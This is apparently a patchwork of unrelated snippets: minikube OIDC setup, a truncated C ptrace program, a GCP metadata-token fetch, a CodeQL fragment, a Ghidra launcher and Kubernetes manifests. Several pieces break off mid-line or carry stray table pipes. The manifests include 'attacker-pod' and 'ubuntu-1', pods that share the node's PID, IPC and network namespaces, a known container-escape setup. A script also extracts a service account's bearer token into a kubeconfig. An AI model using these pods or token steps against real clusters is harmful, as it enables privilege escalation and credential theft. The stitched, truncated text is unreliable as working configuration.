mkdir -p ~/.minikube/files/etc
echo 127.0.0.1 dex.example.com > ~/.minikube/files/etc/hosts
minikube start --kubernetes-version=1.30 \
--extra-config=apiserver.oidc-issuer-url=https://dex.example.com:32000 \| #include <stdio.h> | |
| #include <stdlib.h> | |
| #include <sys/ptrace.h> | |
| #include <sys/types.h> | |
| #include <unistd.h> | |
| #include <assert.h> | |
| #include <signal.h> | |
| void hello() { | |
| printf("Hello debugger\n"); |
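# Get a short-lived access token for the VM's attached service account from the
# Google Cloud instance metadata server (only reachable from inside the VM).
# The endpoint is plain HTTP, so no TLS flags are needed; -f makes curl fail on
# an HTTP error instead of piping an error page into jq.
TOKEN=$(curl -sf -H "Metadata-Flavor: Google" \
  http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token \
  | jq -r '.access_token')
# jq prints "null" (and exits 0) when the field is missing, and an empty string
# when curl produced no output, so check the value rather than the exit status.
if [[ -z "$TOKEN" || "$TOKEN" == "null" ]]; then
  printf 'could not obtain an access token from the metadata server\n' >&2
  exit 1
fi
# Exported for the commands below; note that an exported token is visible to
# every child process of this shell, so keep it out of logs and history.
export TOKEN
# List all repositories in the registry using the access token
curl -u "oauth2accesstoken:$TOKEN" https://eu.gcr.io/v2/_catalog
# Docker login: hand the token over on stdin (--password-stdin) so it never
# appears in argv; printf + quoting instead of an unquoted `echo $TOKEN`.
printf '%s\n' "$TOKEN" | docker login --username oauth2accesstoken --password-stdin eu.gcr.io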
| import go | |
| import semmle.go.dataflow.DataFlow | |
| import semmle.go.dataflow.TaintTracking | |
/**
 * A `strconv` function that parses an integer out of a string:
 * `strconv.Atoi` or `strconv.ParseInt`.
 * Presumably the source set for a taint-tracking configuration defined
 * elsewhere in this query (the DataFlow/TaintTracking imports above).
 */
class IntegerSource extends Function {
  IntegerSource() { this.hasQualifiedName("strconv", ["Atoi", "ParseInt"]) }
}
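#######################################
# Launch the blacktop/ghidra container with X11 forwarding to this display.
# Globals:   HOME, DISPLAY (read)
#            GHIDRA_HOME (read, optional): base directory holding conf/.ghidra
#            and the project storage; defaults to the previously hard-coded
#            /home/user1/Work/ghidra so existing setups keep working.
# Arguments: none
# Outputs:   container and xhost output
# Returns:   exit status of the final `xhost -local:root`
#######################################
ghidra() {
  local base=${GHIDRA_HOME:-/home/user1/Work/ghidra}
  del_stopped ghidra
  # Grant local root (what the container runs as) access to the X server; it is
  # revoked again below. There is no `set -e` here, so the revoke also runs when
  # docker run fails.
  xhost +local:root
  docker run --init -it --rm --name ghidra \
    --cpus 2 --memory 4g -e MAXMEM=4G \
    -v /etc/localtime:/etc/localtime:ro \
    -v /tmp/.X11-unix:/tmp/.X11-unix \
    -v "${HOME}/.gtkrc:/root/.gtkrc" \
    -e "DISPLAY=unix${DISPLAY}" \
    -v "${base}/conf/.ghidra:/root/.ghidra" \
    -v "${base}:/root/storage" \
    blacktop/ghidra
  xhost -local:root
}
ghidra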
# Pod Security Policy for the developers tier: no privileged containers, no
# privilege escalation, no sharing of the node's network/PID/IPC namespaces.
# NOTE(review): PodSecurityPolicy (policy/v1beta1) was removed in Kubernetes
# v1.25, while the minikube cluster above is started with
# --kubernetes-version=1.30 — on that version this manifest is rejected and the
# equivalent restriction has to come from Pod Security Admission namespace
# labels (or another admission controller). Confirm the intended version.
apiVersion: policy/v1beta1
kind: PodSecurityPolicy
metadata:
  name: developers-psp
spec:
  privileged: false
  allowPrivilegeEscalation: false
  # These three flags are exactly what the attacker-pod / ubuntu-1 manifests on
  # this page request; a pod asking for them is denied by this policy.
  hostNetwork: false
  hostPID: false
  hostIPC: false
# Pod that asks to share the node's PID, IPC and network namespaces — the
# configuration the developers-psp policy above exists to reject. On clusters
# using Pod Security Admission, the "baseline" profile forbids all three
# fields; requests for them are also visible in the API server audit log.
apiVersion: v1
kind: Pod
metadata:
  labels:
    run: attacker-pod
  name: attacker-pod
spec:
  hostPID: true
  hostIPC: true
  hostNetwork: true
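#!/bin/bash
# Collect the pieces of a kubeconfig for the developer-sa service account in the
# "developers" namespace: API server URL, bearer token and CA certificate. Each
# value is exported for the heredoc that follows. Fail fast rather than silently
# exporting empty strings, which would produce a kubeconfig that cannot connect.
set -euo pipefail

# API server URL of the current context, read from kubeconfig itself instead of
# scraping the coloured `kubectl cluster-info` output (whose "master" label was
# renamed "control plane" in newer kubectl, which left the old grep empty).
TARGET_CONFIGSERVER=$(kubectl config view --minify -o jsonpath='{.clusters[0].cluster.server}')
export TARGET_CONFIGSERVER

# Name of the token Secret attached to the service account.
# NOTE(review): since Kubernetes v1.24 service accounts no longer get an
# auto-created token Secret, so .secrets[0] is empty there unless a
# kubernetes.io/service-account-token Secret was created by hand — confirm
# against the target cluster version.
TARGET_TOKENNAME=$(kubectl -n developers get sa developer-sa -o jsonpath='{.secrets[0].name}')
if [[ -z "$TARGET_TOKENNAME" ]]; then
  printf 'developer-sa has no token secret\n' >&2
  exit 1
fi
export TARGET_TOKENNAME

# Bearer token, base64-decoded for use as a kubeconfig token.
TARGET_CONFIGTOKEN=$(kubectl -n developers get secret "$TARGET_TOKENNAME" -o "jsonpath={.data.token}" | base64 -d)
export TARGET_CONFIGTOKEN
# CA certificate, deliberately left base64-encoded (presumably consumed as
# certificate-authority-data by the heredoc that follows).
TARGET_CONFIGCRT=$(kubectl -n developers get secret "$TARGET_TOKENNAME" -o "jsonpath={.data['ca\.crt']}")
export TARGET_CONFIGCRT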
| cat <<EOF | |
| apiVersion: v1 | |
| kind: Config |
# Namespace that the developer-sa ServiceAccount (used by the kubeconfig script
# above) lives in.
apiVersion: v1
kind: Namespace
metadata:
  name: developers
| --- | |
| apiVersion: v1 | |
| kind: ServiceAccount | |
| metadata: |
# Same host-namespace request as attacker-pod (node PID, IPC and network
# namespaces shared with the pod), under the name ubuntu-1. The developers-psp
# policy on this page denies all three fields. The containers section is not
# visible here, so the manifest may be truncated.
apiVersion: v1
kind: Pod
metadata:
  labels:
    run: ubuntu-1
  name: ubuntu-1
spec:
  hostPID: true
  hostIPC: true
  hostNetwork: true